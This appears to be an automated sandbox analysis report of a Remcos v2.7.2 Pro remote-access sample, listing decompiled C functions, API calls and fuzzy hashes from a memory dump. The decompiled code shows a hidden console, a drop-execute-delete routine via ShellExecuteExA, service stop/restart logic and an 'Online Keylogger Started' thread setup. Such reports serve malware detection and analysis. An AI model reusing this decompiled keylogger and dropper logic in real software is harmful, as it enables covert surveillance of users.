                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                                                                  • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                                                                  • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                                                                  • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                                                                  • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                                                                  • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                                                                  • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                                                                  • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                                                                  • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                                                                  • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                                                                  • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                                                                  • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                                                                  • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                                                • String ID:
                                                                                • API String ID: 3444260106-0
                                                                                • Opcode ID: c63ab60c1a98669919cb26f4f991ffaadf3270ae8065bccc709894317ab7d55a
                                                                                • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                                                                • Opcode Fuzzy Hash: c63ab60c1a98669919cb26f4f991ffaadf3270ae8065bccc709894317ab7d55a
                                                                                • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004117C7, Relevance: 15.1, APIs: 10, Instructions: 61serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E004117C7(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t12;
				int _t20;
				void* _t23;
				void* _t24;

				_t20 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x11);
				_t24 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
				if(_t23 != 0) {
					if(ControlService(_t23, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t23,  &_v32);
						} while (_v28 != 1);
						_t12 = StartServiceW(_t23, 0, 0);
						asm("sbb eax, eax");
						_t20 = ( ~_t12 & 0x000000fe) + 3;
					} else {
						_t20 = 2;
					}
					CloseServiceHandle(_t24);
					CloseServiceHandle(_t23);
				} else {
					CloseServiceHandle(_t24);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t20;
			}










                                                                                0x004117d0
                                                                                0x004117d6
                                                                                0x004117e4
                                                                                0x004117e6
                                                                                0x004117f4
                                                                                0x004117f8
                                                                                0x00411812
                                                                                0x00411818
                                                                                0x0041181d
                                                                                0x00411823
                                                                                0x0041182c
                                                                                0x00411834
                                                                                0x0041183b
                                                                                0x00411814
                                                                                0x00411814
                                                                                0x00411814
                                                                                0x00411844
                                                                                0x00411847
                                                                                0x004117fa
                                                                                0x004117fb
                                                                                0x004117fb
                                                                                0x0041184c
                                                                                0x00411858

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                                                                • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                                                                • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                                                                • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413D3D, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 63%
                                                                                			E00413D3D(signed int __edx, intOrPtr _a4) {
				void _v1003;
				char _v1004;
				struct HWND__* _t13;
				signed int _t34;
				signed int _t36;
				unsigned int _t40;
				signed int _t41;
				signed int _t47;
				signed int _t50;
				signed int _t56;
				signed int _t59;
				signed int _t64;
				signed int _t65;
				void* _t91;
				void* _t92;
				void* _t93;

				_t64 = __edx;
				AllocConsole();
				_t13 =  *0x41c1f8();
				 *0x41c1fc = _t13;
				if(_a4 == 0) {
					ShowWindow(_t13, 0);
				}
				freopen("CONOUT$", 0x416e44, __imp___iob + 0x20);
				_v1004 = 0;
				memset( &_v1003, 0, 0xf9 << 2);
				asm("stosw");
				asm("stosb");
				_t65 = _t64 | 0xffffffff;
				asm("repne scasb");
				_t40 =  !_t65;
				_t91 = " * Remcos v" - _t40;
				_t41 = _t40 >> 2;
				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
				asm("repne scasb");
				_t47 =  !_t65;
				_t92 = "2.7.2 Pro" - _t47;
				_t34 = _t47;
				asm("repne scasb");
				_t50 = _t34 >> 2;
				memcpy( &_v1004 - 1, _t92, _t50 << 2);
				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
				asm("repne scasb");
				_t56 =  !_t65;
				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
				_t36 = _t56;
				asm("repne scasb");
				_t59 = _t36 >> 2;
				memcpy( &_v1004 - 1, _t93, _t59 << 2);
				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
				return printf( &_v1004);
			}



















                                                                                0x00413d3d
                                                                                0x00413d49
                                                                                0x00413d4f
                                                                                0x00413d57
                                                                                0x00413d5f
                                                                                0x00413d63
                                                                                0x00413d63
                                                                                0x00413d7c
                                                                                0x00413d8f
                                                                                0x00413d95
                                                                                0x00413d97
                                                                                0x00413d99
                                                                                0x00413d9a
                                                                                0x00413da6
                                                                                0x00413da8
                                                                                0x00413db4
                                                                                0x00413dbe
                                                                                0x00413dca
                                                                                0x00413dd3
                                                                                0x00413dd5
                                                                                0x00413dd9
                                                                                0x00413ddd
                                                                                0x00413de1
                                                                                0x00413de6
                                                                                0x00413de9
                                                                                0x00413df6
                                                                                0x00413dff
                                                                                0x00413e01
                                                                                0x00413e05
                                                                                0x00413e09
                                                                                0x00413e0d
                                                                                0x00413e12
                                                                                0x00413e15
                                                                                0x00413e23
                                                                                0x00413e32

                                                                                APIs
                                                                                • AllocConsole.KERNEL32(00017838,0041BCB0,00000000), ref: 00413D49
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                                                                • freopen.MSVCRT ref: 00413D7C
                                                                                • printf.MSVCRT ref: 00413E25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocConsoleShowWindowfreopenprintf
                                                                                • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                                                                • API String ID: 3419900118-1124569734
                                                                                • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                                                                • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                                                                • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                                                                • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405BC0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 45%
                                                                                			E00405BC0(void* __ecx) {
				char _v5;
				char _v6;
				void* _t8;
				void* _t31;

				_push(__ecx);
				_t31 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
					 *((char*)(__ecx + 0x3d)) = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
					E00405DD3(__ecx);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
						E00405156(_t31);
						if( *_t31 == 0) {
							CreateThread(0, 0, E0040526A, _t31, 0, 0);
						}
						CreateThread(0, 0, E00405299, _t31, 0, 0);
					}
					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
					 *(_t31 + 0x28) = _t8;
				}
				return _t8;
			}







                                                                                0x00405bc3
                                                                                0x00405bc6
                                                                                0x00405bce
                                                                                0x00405be3
                                                                                0x00405be7
                                                                                0x00405bef
                                                                                0x00405bfe
                                                                                0x00405c12
                                                                                0x00405c18
                                                                                0x00405c29
                                                                                0x00405c2d
                                                                                0x00405c34
                                                                                0x00405c40
                                                                                0x00405c40
                                                                                0x00405c4c
                                                                                0x00405c4c
                                                                                0x00405c58
                                                                                0x00405c5a
                                                                                0x00405c5a
                                                                                0x00405c61

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                                                                  • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                                                                • String ID: Online Keylogger Started$[INFO]
                                                                                • API String ID: 3243250608-3343292223
                                                                                • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                                                                • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                                                                • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                                                                • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E254, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E0040E254(void* __eax, void* __eflags) {
				void* _t7;
				void* _t9;
				void* _t28;

				_t33 = __eflags;
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
				E004017DD(_t28 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}






                                                                                0x0040e254
                                                                                0x0040e25d
                                                                                0x0040e266
                                                                                0x0040e273
                                                                                0x0040e27a
                                                                                0x0040e286
                                                                                0x0040e28d
                                                                                0x0040e29e
                                                                                0x0040e2aa
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                                                                  • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                                                                • String ID: name
                                                                                • API String ID: 4248281052-1579384326
                                                                                • Opcode ID: 03508dd26161fed5f6b9b92cfe1b6fd940dafe9083f5dda7ad429ebf3daae731
                                                                                • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                                                                • Opcode Fuzzy Hash: 03508dd26161fed5f6b9b92cfe1b6fd940dafe9083f5dda7ad429ebf3daae731
                                                                                • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411AF5, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 34sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00411AF5(void* __ecx, WCHAR* _a4) {
				char _v5;
				char _v6;
				void* _t13;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}






                                                                                0x00411b08
                                                                                0x00411b1c
                                                                                0x00411b22
                                                                                0x00411b41
                                                                                0x00411b48
                                                                                0x00411b58

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
